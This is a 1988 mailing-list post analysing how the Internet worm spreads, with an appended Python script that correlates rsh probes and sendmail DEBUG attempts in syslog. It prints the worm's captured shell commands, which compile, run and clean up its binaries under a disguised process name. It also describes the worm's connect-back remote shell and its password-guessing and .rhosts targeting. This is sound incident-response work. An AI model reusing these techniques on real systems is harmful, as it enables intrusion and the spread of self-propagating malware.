salzman@RAND.ORG (Isaac) (11/04/88)
After carefully leaving the sendmail ``hole'' open on our Internet machine I've been able to track (for the most part) what the virus is doing and how it's spreading itself.

The C program that is uploaded and compiled is only the start. After it's compiled it's run with the following arguments: argv[1] is the Internet addr of the infecting host, argv[2] is the port to connect to on that host and argv[3] is the "magic" number. It connects back to the infecting host and *carefully* transfers 3 files over. The socket remains open and /bin/sh is then exec'd so the infecting host can send shell commands to it after the files are transferred.

Following is an excerpt from the log file of my hacked-up version of the .c file that's uploaded:

    virus: pid=6828, args; x15886501 10.4.0.7 29451 15525687
    connection on sockect 0 active
    trying to write to file 'x15901447,sun3.o', len=47165
    file 'x15901447,sun3.o' written!
    trying to write to file 'x3338475,vax.o', len=45734
    file 'x3338475,vax.o' written!
    trying to write to file 'x11091853,l1.c', len=1542
    file 'x11091853,l1.c' written!
    starting up 'snoop' to watch the rest of the socket

"Snoop" is a shell script that's run in place of /bin/sh to capture the shell commands that are being sent from the infecting host. Following is a log of the shell commands that are being sent:

    PATH=/bin:/usr/bin:/usr/ucb
    rm -f sh
    if [ -f sh ]
    then
        P=x10903971
    else
        P=sh
    fi
    cc -o $P x15901447,sun3.o
    ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c
    rm -f $P
    cc -o $P x3338475,vax.o
    ./$P -p $$ x15901447,sun3.o x3338475,vax.o x11091853,l1.c
    rm -f $P
    rm -f x15901447,sun3.o $P
    rm -f x3338475,vax.o $P
    rm -f x11091853,l1.c $P

The real key is to find out what ./$P is actually doing. Knowing the arguments to the program that's uploaded and executed may be 1/2 the battle there - especially if you're running on a Sun 3 with SunOS 4.0 (let's thank Sun for the "trace" command).
So it's starting itself again, probably using the pid ($$) as random seed, the rest of the arguments being the names of the files to send off to the next victim. It looks real innocent when you see "(sh)" in a ps listing (note what $P is set to)....

Earlier today Jim Gillogly (jim@rand.org) was able to find a table of potential passwords that are probably used to crack accounts on the infected machine. Some other research into the matter strongly suggests that .rhosts and hosts.equiv files are used to target the next victim (that seems to be common knowledge).

It apparently tries one of two ways to break into a machine. First it seems to try the rsh port. I've hacked up rshd to report all outside attempts via syslog. It would consistently come in over rsh a minute or so before trying the SMTP port. Terry West (terry@rand.org) hacked sendmail to report attempts to use the 'debug' command to the SMTP server and log that with syslog as well, so we get stuff like this:

    Nov 3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008,addr=10.4.0.7
    Nov 3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.COM
    Nov 3 18:43:08 rand-unix rsh[5106]: external address detected port=2,fam=1021,addr=10.2.0.10
    Nov 3 18:43:41 rand-unix sendmail[5126]: AA05126: DEBUG set from: XN.LL.MIT.EDU
    Nov 3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,addr=128.52.32.14
    Nov 3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.EDU
    Nov 3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015,addr=10.4.0.7
    Nov 3 19:29:34 rand-unix rsh[6725]: external address detected port=2,fam=1003,addr=10.4.0.7
    Nov 3 19:48:14 rand-unix rsh[7592]: external address detected port=2,fam=996,addr=10.4.0.7
    Nov 3 19:48:46 rand-unix sendmail[7614]: AA07614: DEBUG set from: SM.UNISYS.COM
    Nov 3 19:55:50 rand-unix rsh[7698]: external address detected port=2,fam=1018,addr=10.6.0.94
    Nov 3 19:56:25 rand-unix sendmail[7712]: AA07712: DEBUG set from: UXC.CSO.UIUC.EDU

So that's the scoop, so far. Of course by the time this makes it out to the tcp-ip list this will be old news, eh? :-) Now to tear apart the fake "sh".....

Ciao!

-- 
* Isaac J. Salzman
* The RAND Corporation - Information Sciences Dept.
* 1700 Main St., PO Box 2138, Santa Monica, CA 90406-2138
* AT&T: +1 213-393-0411 x6421 or x7923 (ISL lab)
* ARPA: salzman@RAND.ORG or salzman@rand-unix.ARPA
* UUCP: ...!{cbosgd,decvax,sdcrdcf}!randvax!salzman
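The "rsh probe a minute or so before the SMTP DEBUG" pattern the post describes, as an added detection example that is not part of the original post: it parses syslog lines in the format quoted above and pairs each sendmail DEBUG event with the most recent rshd "external address detected" event inside a time window. The sample lines are a subset of those quoted in the post; the year (syslog records none), the two-minute window and the function names are assumptions made here.

```python
import re
from datetime import datetime

# Subset of the syslog lines quoted in the post above (constructed sample input).
SAMPLE_LOG = """\
Nov 3 18:10:12 rand-unix rsh[4311]: external address detected port=2,fam=1008,addr=10.4.0.7
Nov 3 18:10:43 rand-unix sendmail[4328]: AA04328: DEBUG set from: SM.UNISYS.COM
Nov 3 18:43:08 rand-unix rsh[5106]: external address detected port=2,fam=1021,addr=10.2.0.10
Nov 3 18:43:41 rand-unix sendmail[5126]: AA05126: DEBUG set from: XN.LL.MIT.EDU
Nov 3 18:55:59 rand-unix rsh[5377]: external address detected port=2,fam=991,addr=128.52.32.14
Nov 3 18:57:18 rand-unix sendmail[5421]: AA05421: DEBUG set from: XN.LL.MIT.EDU
Nov 3 19:03:56 rand-unix rsh[5652]: external address detected port=2,fam=1015,addr=10.4.0.7
"""

# "Mon D HH:MM:SS host prog[pid]: message" -- the classic BSD syslog layout.
LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) (\S+) (\w+)\[(\d+)\]: (.*)$")
RSH_ADDR_RE = re.compile(r"external address detected .*addr=(\S+)")
DEBUG_RE = re.compile(r"DEBUG set from: (\S+)")


def parse(log, year=1988):
    """Return (timestamp, kind, source) events; kind is 'rsh' or 'debug'."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unrelated or malformed line
        stamp, _host, prog, _pid, msg = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")  # year assumed
        if prog == "rsh" and (a := RSH_ADDR_RE.search(msg)):
            events.append((ts, "rsh", a.group(1)))
        elif prog == "sendmail" and (d := DEBUG_RE.search(msg)):
            events.append((ts, "debug", d.group(1)))
    return events


def correlate(events, window=120):
    """Pair each sendmail DEBUG with the latest rsh probe within `window` seconds.

    Returns (rsh_addr, smtp_source, seconds_between); rsh_addr/seconds are None
    when no probe preceded the DEBUG closely enough (DEBUG alone is still worth flagging).
    """
    hits, last_rsh = [], None
    for ts, kind, src in sorted(events):
        if kind == "rsh":
            last_rsh = (ts, src)
        elif kind == "debug":
            if last_rsh and (ts - last_rsh[0]).total_seconds() <= window:
                hits.append((last_rsh[1], src, int((ts - last_rsh[0]).total_seconds())))
            else:
                hits.append((None, src, None))
    return hits
```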